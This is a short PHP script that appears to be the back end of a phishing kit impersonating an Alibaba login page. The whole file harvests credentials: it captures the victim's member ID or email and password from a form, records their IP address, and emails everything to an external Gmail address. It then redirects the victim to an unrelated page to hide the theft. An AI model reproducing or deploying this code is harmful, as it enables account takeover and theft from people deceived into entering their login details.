<?
$ip = getenv("REMOTE_ADDR");
$message  = "---------------+ Alibaba Network ReZulT +--------------\n";
$message .= "Email or Member ID: ".$_POST['user_name']."\n";
$message .= "Password: ".$_POST['password']."\n";
$message .= "IP: ".$ip."\n";
$message .= "---------------Created By Nzube-----------------\n";
$send = "millywilson2008@gmail.com";
$subject = "Alibaba RezulTz";
$headers = "From: Ali<logs@o2.com>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail("$send", "$subject", $message); 
header("Location: http://www.123rf.com/stock-photo/machine.html");
    

?>


